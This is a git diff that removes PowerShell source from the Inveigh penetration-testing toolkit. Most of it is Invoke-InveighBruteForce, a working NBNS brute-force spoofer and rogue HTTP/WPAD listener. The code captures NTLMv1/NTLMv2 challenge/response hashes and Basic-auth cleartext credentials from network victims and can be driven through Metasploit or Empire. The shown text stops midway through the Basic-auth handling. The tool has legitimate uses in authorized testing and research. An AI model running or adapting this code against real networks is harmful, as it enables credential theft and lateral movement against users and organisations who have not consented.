- { - - if($inveigh.output_stream_only) - { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) - } - else - { - - switch -wildcard ($inveigh.console_queue[0]) - { - - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* written to *" - { - - if($inveigh.file_output) - { - Write-Warning $inveigh.console_queue[0] - } - - $inveigh.console_queue.RemoveRange(0,1) - } - - "* for relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "*SMB relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* local administrator *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - } - - } - - } - - if([Console]::KeyAvailable) - { - $inveigh.console_output = $false - BREAK console_loop - } - - Start-Sleep -m 5 - } - - } - else - { - Write-Output "Inveigh isn't running" - } - - } - else - { - Write-Output "Watch-Inveigh cannot be used with current external tool selection" - } - -} - -function Clear-Inveigh -{ - <# - .SYNOPSIS - Clear-Inveigh will clear Inveigh data from memory. - #> - - if($inveigh) - { - - if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.bruteforce_running) - { - Remove-Variable inveigh -scope global - Write-Output "Inveigh data has been cleared from memory" - } - else - { - Write-Output "Run Stop-Inveigh before running Clear-Inveigh" - } - - } - -} diff --git a/scripts/Invoke-InveighBruteForce.ps1 b/scripts/Invoke-InveighBruteForce.ps1 deleted file mode 100644 index f85a094..0000000 --- a/scripts/Invoke-InveighBruteForce.ps1 +++ /dev/null @@ -1,1736 +0,0 @@ -function Invoke-InveighBruteForce -{ -<# -.SYNOPSIS -Invoke-InveighBruteForce is a remote (Hot Potato method)/unprivileged NBNS brute force spoofer. - -.DESCRIPTION -Invoke-InveighBruteForce is a remote (Hot Potato method)/unprivileged NBNS brute force spoofer with the following -features: - - Targeted IPv4 NBNS brute force spoofer with granular control - NTLMv1/NTLMv2 challenge/response capture over HTTP - Granular control of console and file output - Run time control - -This function can be used to perform NBNS spoofing across subnets and/or perform NBNS spoofing without an elevated -administrator or SYSTEM shell. - -.PARAMETER SpooferIP -Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system -other than the Inveigh Brute Force host. - -.PARAMETER SpooferTarget -Specify an IP address to target for brute force NBNS spoofing. - -.PARAMETER Hostname -Default = WPAD: Specify a hostname for NBNS spoofing. - -.PARAMETER NBNS -Default = Disabled: (Y/N) Enable/Disable NBNS spoofing. - -.PARAMETER NBNSPause -Default = Disabled: (Integer) Specify the number of seconds the NBNS brute force spoofer will stop spoofing after -an incoming HTTP request is received. - -.PARAMETER NBNSTTL -Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet. - -.PARAMETER HTTP -Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. - -.PARAMETER HTTPIP -Default = Any: Specify a TCP IP address for the HTTP listener. - -.PARAMETER HTTPPort -Default = 80: Specify a TCP port for the HTTP listener. - -.PARAMETER HTTPAuth -Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not -apply to wpad.dat requests. - -.PARAMETER HTTPBasicRealm -Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. - -.PARAMETER HTTPResponse -Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat -requests. Use PowerShell character escapes where necessary. - -.PARAMETER WPADAuth -Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. -Setting to Anonymous can prevent browser login prompts. - -.PARAMETER WPADIP -Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter -must be used with WPADPort. - -.PARAMETER WPADPort -Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter -must be used with WPADIP. - -.PARAMETER WPADDirectHosts -Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the -defined proxy. Use PowerShell character escapes where necessary. - -.PARAMETER WPADResponse -Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and -WPADPort are set. - -.PARAMETER Challenge -Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a -random challenge will be generated for each request. This will only be used for non-relay captures. - -.PARAMETER MachineAccounts -Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. - -.PARAMETER ConsoleOutput -Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to -ensure that it doesn't hang the shell. - -.PARAMETER FileOutput -Default = Disabled: (Y/N) Enable/Disable real time file output. - -.PARAMETER StatusOutput -Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. - -.PARAMETER OutputStreamOnly -Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if -running Inveigh Brute Force through a shell that does not return other output streams. Note that you will not see -the various yellow warning messages if enabled. - -.PARAMETER OutputDir -Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must -also be enabled. - -.PARAMETER RunTime -Default = Unlimited: (Integer) Set the run time duration in minutes. - -.PARAMETER RunCount -Default = Unlimited: (Integer) Set the number of captures to perform before auto-exiting. - -.PARAMETER ShowHelp -Default = Enabled: (Y/N) Enable/Disable the help messages at startup. - -.PARAMETER Tool -Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's -Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire - -.EXAMPLE -Import-Module .\Inveigh.psd1;Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 -Import full module and target 192.168.1.11 for 'WPAD' hostname spoofs. - -.EXAMPLE -Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 -Hostname server1 -Target 192.168.1.11 for 'server1' hostname spoofs. - -.EXAMPLE -Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 -WPADIP 192.168.10.10 -WPADPort 8080 -Target 192.168.1.11 for 'WPAD' hostname spoofs and respond to wpad.dat requests with a proxy of 192.168.10.10:8080. - -.LINK -https://github.com/Kevin-Robertson/Inveigh -#> - -# Parameter default values can be modified in this section: -[CmdletBinding()] -param -( - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y", - [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0", - [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth="NTLM", - [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth="NTLM", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP="", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferTarget="", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir="", - [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge="", - [parameter(Mandatory=$false)][Array]$WPADDirectHosts="", - [parameter(Mandatory=$false)][Int]$HTTPPort="80", - [parameter(Mandatory=$false)][Int]$NBNSPause="", - [parameter(Mandatory=$false)][Int]$NBNSTTL="165", - [parameter(Mandatory=$false)][Int]$WPADPort="", - [parameter(Mandatory=$false)][Int]$RunCount="", - [parameter(Mandatory=$false)][Int]$RunTime="", - [parameter(Mandatory=$false)][String]$HTTPBasicRealm="IIS", - [parameter(Mandatory=$false)][String]$HTTPResponse="", - [parameter(Mandatory=$false)][String]$WPADResponse="", - [parameter(Mandatory=$false)][String]$Hostname = "WPAD", - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter -) - -if ($invalid_parameter) -{ - throw "$($invalid_parameter) is not a valid parameter." -} - -if(!$SpooferIP) -{ - $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) -} - -if($NBNS -eq 'Y' -and !$SpooferTarget) -{ - throw "You must specify a -SpooferTarget if enabling -NBNS" -} - -if($WPADIP -or $WPADPort) -{ - - if(!$WPADIP) - { - throw "You must specify a -WPADPort to go with -WPADIP" - } - - if(!$WPADPort) - { - throw "You must specify a -WPADIP to go with -WPADPort" - } - -} - -if(!$OutputDir) -{ - $output_directory = $PWD.Path -} -else -{ - $output_directory = $OutputDir -} - -if(!$inveigh) -{ - $global:inveigh = [HashTable]::Synchronized(@{}) - $inveigh.log = New-Object System.Collections.ArrayList - $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList - $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList - $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList - $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList - $inveigh.cleartext_list = New-Object System.Collections.ArrayList - $inveigh.IP_capture_list = New-Object System.Collections.ArrayList - $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList -} - -if($inveigh.bruteforce_running) -{ - throw "Invoke-InveighBruteForce is already running, use Stop-Inveigh" -} - -$inveigh.console_queue = New-Object System.Collections.ArrayList -$inveigh.status_queue = New-Object System.Collections.ArrayList -$inveigh.log_file_queue = New-Object System.Collections.ArrayList -$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList -$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList -$inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList -$inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList -$inveigh.console_output = $false -$inveigh.console_input = $true -$inveigh.file_output = $false -$inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" -$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" -$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" -$inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" -$inveigh.challenge = $Challenge -$inveigh.hostname_spoof = $false -$inveigh.bruteforce_running = $true - -if($StatusOutput -eq 'Y') -{ - $inveigh.status_output = $true -} -else -{ - $inveigh.status_output = $false -} - -if($OutputStreamOnly -eq 'Y') -{ - $inveigh.output_stream_only = $true -} -else -{ - $inveigh.output_stream_only = $false -} - -if($Tool -eq 1) # Metasploit Interactive PowerShell -{ - $inveigh.tool = 1 - $inveigh.output_stream_only = $true - $inveigh.newline = "" - $ConsoleOutput = "N" -} -elseif($Tool -eq 2) # PowerShell Empire -{ - $inveigh.tool = 2 - $inveigh.output_stream_only = $true - $inveigh.console_input = $false - $inveigh.newline = "`n" - $ConsoleOutput = "Y" - $ShowHelp = "N" -} -else -{ - $inveigh.tool = 0 - $inveigh.newline = "" -} - -# Write startup messages -$inveigh.status_queue.Add("Inveigh Brute Force started at $(Get-Date -format 's')") > $null -$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Brute Force started")]) > $null - -if($NBNS -eq 'Y') -{ - $inveigh.status_queue.Add("NBNS Brute Force Spoofer Target = $SpooferTarget") > $null - $inveigh.status_queue.Add("NBNS Brute Force Spoofer IP Address = $SpooferIP") > $null - $inveigh.status_queue.Add("NBNS Brute Force Spoofer Hostname = $Hostname") > $null - - if($NBNSPause) - { - $inveigh.status_queue.Add("NBNS Brute Force Pause = $NBNSPause Seconds") > $null - } - - $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null -} -else -{ - $inveigh.status_queue.Add("NBNS Brute Force Spoofer Disabled") > $null -} - -if($HTTP -eq 'Y') -{ - - if($HTTPIP) - { - $inveigh.status_queue.Add("HTTP IP Address = $HTTPIP") > $null - } - - if($HTTPPort -ne 80) - { - $inveigh.status_queue.Add("HTTP Port = $HTTPPort") > $null - } - - $inveigh.status_queue.Add("HTTP Capture Enabled") > $null - $inveigh.status_queue.Add("HTTP Authentication = $HTTPAuth") > $null - $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null - - if($HTTPResponse) - { - $inveigh.status_queue.Add("HTTP Custom Response Enabled") > $null - } - - if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic') - { - $inveigh.status_queue.Add("Basic Authentication Realm = $HTTPBasicRealm") > $null - } - - if($WPADIP -and $WPADPort) - { - $inveigh.status_queue.Add("WPAD = $WPADIP`:$WPADPort") > $null - - if($WPADDirectHosts) - { - $inveigh.status_queue.Add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",") > $null - } - - } - elseif($WPADResponse -and !$WPADIP -and !$WPADPort) - { - $inveigh.status_queue.Add("WPAD Custom Response Enabled") > $null - } - - if($Challenge) - { - $inveigh.status_queue.Add("NTLM Challenge = $Challenge") > $null - } - - if($MachineAccounts -eq 'n') - { - $inveigh.status_queue.Add("Ignoring Machine Accounts") > $null - $inveigh.machine_accounts = $false - } - else - { - $inveigh.machine_accounts = $true - } - -} -else -{ - $inveigh.status_queue.Add("HTTP Capture Disabled") > $null -} - -if($ConsoleOutput -eq 'Y') -{ - $inveigh.status_queue.Add("Real Time Console Output Enabled") > $null - $inveigh.console_output = $true -} -else -{ - - if($inveigh.tool -eq 1) - { - $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null - } - else - { - $inveigh.status_queue.Add("Real Time Console Output Disabled") > $null - } - -} - -if($FileOutput -eq 'Y') -{ - $inveigh.status_queue.Add("Real Time File Output Enabled") > $null - $inveigh.status_queue.Add("Output Directory = $output_directory") > $null - $inveigh.file_output = $true -} -else -{ - $inveigh.status_queue.Add("Real Time File Output Disabled") > $null -} - -if($RunTime -eq 1) -{ - $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null -} -elseif($RunTime -gt 1) -{ - $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null -} - -if($RunCount) -{ - $inveigh.status_queue.Add("Run Count = $RunCount") > $null -} - -if($ShowHelp -eq 'Y') -{ - $inveigh.status_queue.Add("Use Get-Command -Noun Inveigh* to show available functions") > $null - $inveigh.status_queue.Add("Run Stop-Inveigh to stop running Inveigh functions") > $null - - if($inveigh.console_output) - { - $inveigh.status_queue.Add("Press any key to stop real time console output") > $null - } - -} - -if($inveigh.status_output) -{ - - while($inveigh.status_queue.Count -gt 0) - { - - if($inveigh.output_stream_only) - { - Write-Output($inveigh.status_queue[0] + $inveigh.newline) - $inveigh.status_queue.RemoveRange(0,1) - } - else - { - - switch ($inveigh.status_queue[0]) - { - - "Run Stop-Inveigh to stop running Inveigh functions" - { - Write-Warning($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) - } - - default - { - Write-Output($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) - } - - } - - } - - } - -} - -# Begin ScriptBlocks - -# Shared Basic functions ScriptBlock -$shared_basic_functions_scriptblock = -{ - function DataLength - { - param ([Int]$length_start,[Byte[]]$string_extract_data) - - $string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start + 1)],0) - return $string_length - } - - function DataToString - { - param ([Int]$string_length,[Int]$string2_length,[Int]$string3_length,[Int]$string_start,[Byte[]]$string_extract_data) - - $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length - 1)]) - $string_data = $string_data -replace "-00","" - $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $string_extract = New-Object System.String ($string_data,0,$string_data.Length) - return $string_extract - } - - function HTTPListenerStop - { - $inveigh.console_queue.Add("$(Get-Date -format 's') - Attempting to stop HTTP listener") - $inveigh.HTTP_client.Close() - start-sleep -s 1 - $inveigh.HTTP_listener.server.blocking = $false - Start-Sleep -s 1 - $inveigh.HTTP_listener.server.Close() - Start-Sleep -s 1 - $inveigh.HTTP_listener.Stop() - } - -} - -# HTTP Server ScriptBlock - HTTP listener -$HTTP_scriptblock = -{ - param ($HTTPAuth,$HTTPBasicRealm,$HTTPResponse,$NBNSPause,$WPADAuth,$WPADIP,$WPADPort,$WPADDirectHosts,$WPADResponse,$RunCount) - - function NTLMChallengeBase64 - { - - $HTTP_timestamp = Get-Date - $HTTP_timestamp = $HTTP_timestamp.ToFileTime() - $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp)) - $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - - if($inveigh.challenge) - { - $HTTP_challenge = $inveigh.challenge - $HTTP_challenge_bytes = $inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') - $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - } - else - { - $HTTP_challenge_bytes = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) - $HTTP_challenge = $HTTP_challenge_bytes -replace ' ', '' - $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - } - - $inveigh.HTTP_challenge_queue.Add($inveigh.HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $inveigh.HTTP_client.Client.RemoteEndpoint.Port + ',' + $HTTP_challenge) > $null - - $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38, - 0x00,0x00,0x00,0x05,0x82,0x89,0xa2 + - $HTTP_challenge_bytes + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06, - 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00, - 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54, - 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00, - 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24, - 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, - 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61, - 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00, - 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 + - $HTTP_timestamp + - 0x00,0x00,0x00,0x00,0x0a,0x0a - - $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) - $NTLM = 'NTLM ' + $NTLM_challenge_base64 - $NTLM_challenge = $HTTP_challenge - - return $NTLM - } - - $HTTP_WWW_authenticate_header = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 # WWW-Authenticate - $run_count_NTLMv1 = $RunCount + $inveigh.NTLMv1_list.Count - $run_count_NTLMv2 = $RunCount + $inveigh.NTLMv2_list.Count - $run_count_cleartext = $RunCount + $inveigh.cleartext_list.Count - - if($WPADIP -and $WPADPort) - { - - if($WPADDirectHosts) - { - - foreach($WPAD_direct_host in $WPADDirectHosts) - { - $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";' - } - - $HTTP_WPAD_response = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" - } - else - { - $HTTP_WPAD_response = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" - } - - } - elseif($WPADResponse) - { - $HTTP_WPAD_response = $WPADResponse - } - - :HTTP_listener_loop while ($inveigh.bruteforce_running) - { - - $TCP_request = $NULL - $TCP_request_bytes = New-Object System.Byte[] 1024 - $suppress_waiting_message = $false - - while(!$inveigh.HTTP_listener.Pending() -and !$inveigh.HTTP_client.Connected) - { - - if(!$suppress_waiting_message) - { - $inveigh.console_queue.Add("$(Get-Date -format 's') - Waiting for incoming HTTP connection") - $suppress_waiting_message = $true - } - - Start-Sleep -s 1 - - if(!$inveigh.bruteforce_running) - { - HTTPListenerStop - } - - } - - if(!$inveigh.HTTP_client.Connected) - { - $inveigh.HTTP_client = $inveigh.HTTP_listener.AcceptTcpClient() # will block here until connection - $HTTP_stream = $inveigh.HTTP_client.GetStream() - } - - while ($HTTP_stream.DataAvailable) - { - $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length) - } - - $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes) - - if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*") - { - $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3) - $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length) - - if($NBNSPause) - { - $inveigh.NBNS_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() - $inveigh.hostname_spoof = $true - } - - } - - if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*") - { - $HTTP_authorization_header = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46) - $HTTP_authorization_header = $HTTP_authorization_header.Substring(0,$HTTP_authorization_header.IndexOf("-0D-0A-")) - $HTTP_authorization_header = $HTTP_authorization_header.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $authentication_header = New-Object System.String ($HTTP_authorization_header,0,$HTTP_authorization_header.Length) - } - else - { - $authentication_header = '' - } - - if($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') - { - $HTTP_response_status_code = 0x32,0x30,0x30 - $HTTP_response_phrase = 0x4f,0x4b - } - else - { - $HTTP_response_status_code = 0x34,0x30,0x31 - $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64 - } - - $HTTP_type = "HTTP" - $NTLM = 'NTLM' - $NTLM_auth = $false - - if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $inveigh.HTTP_client.Client.Handle) - { - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for " + $HTTP_request_raw_URL + " received from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address) - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for " + $HTTP_request_raw_URL + " received from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address)]) - } - - if($authentication_header.startswith('NTLM ')) - { - $authentication_header = $authentication_header -replace 'NTLM ','' - [Byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header) - $HTTP_response_status_code = 0x34,0x30,0x31 - - if ($HTTP_request_bytes[8] -eq 1) - { - $HTTP_response_status_code = 0x34,0x30,0x31 - $NTLM = NTLMChallengeBase64 - } - elseif ($HTTP_request_bytes[8] -eq 3) - { - $NTLM = 'NTLM' - $HTTP_NTLM_offset = $HTTP_request_bytes[24] - $HTTP_NTLM_length = DataLength 22 $HTTP_request_bytes - $HTTP_NTLM_domain_length = DataLength 28 $HTTP_request_bytes - $HTTP_NTLM_domain_offset = DataLength 32 $HTTP_request_bytes - [String] $NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $inveigh.HTTP_client.Client.RemoteEndpoint.Port + '*' - $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge) - $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(","))+1) - - if($HTTP_NTLM_domain_length -eq 0) - { - $HTTP_NTLM_domain_string = '' - } - else - { - $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_length 0 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes - } - - $HTTP_NTLM_user_length = DataLength 36 $HTTP_request_bytes - $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_length $HTTP_NTLM_domain_length 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes - $HTTP_NTLM_host_length = DataLength 44 $HTTP_request_bytes - $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_length $HTTP_NTLM_domain_length $HTTP_NTLM_user_length $HTTP_NTLM_domain_offset $HTTP_request_bytes - - if($HTTP_NTLM_length -eq 24) # NTLMv1 - { - $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" - $NTLM_response = $NTLM_response.Insert(48,':') - $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge - - if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) - { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")]) - $inveigh.NTLMv1_file_queue.Add($inveigh.HTTP_NTLM_hash) - $inveigh.NTLMv1_list.Add($inveigh.HTTP_NTLM_hash) - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash) - - if($inveigh.file_output) - { - $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) - } - - } - - $HTTP_response_status_code = 0x32,0x30,0x30 - $HTTP_client_close = $true - $NTLM_challenge = '' - } - else # NTLMv2 - { - $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" - $NTLM_response = $NTLM_response.Insert(32,':') - $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response - - if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) - { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")]) - $inveigh.NTLMv2_file_queue.Add($inveigh.HTTP_NTLM_hash) - $inveigh.NTLMv2_list.Add($inveigh.HTTP_NTLM_hash) - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.HTTP_client.Client.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash) - - if($inveigh.file_output) - { - $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) - } - - } - - } - - $HTTP_response_status_code = 0x32,0x30,0x30 - $HTTP_response_phrase = 0x4f,0x4b - $NTLM_auth = $true - $HTTP_client_close = $true - $NTLM_challenge = '' - } - else - { - $NTLM = 'NTLM' - } - - } - elseif($authentication_header.startswith('Basic ')) - { - $HTTP_response_status_code = 0x32,0x30,0x30 - $HTTP_response_phrase = 0x4f,0x4b - $authentication_header = $authentication_header -replace 'Basic ','' - $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header)) - 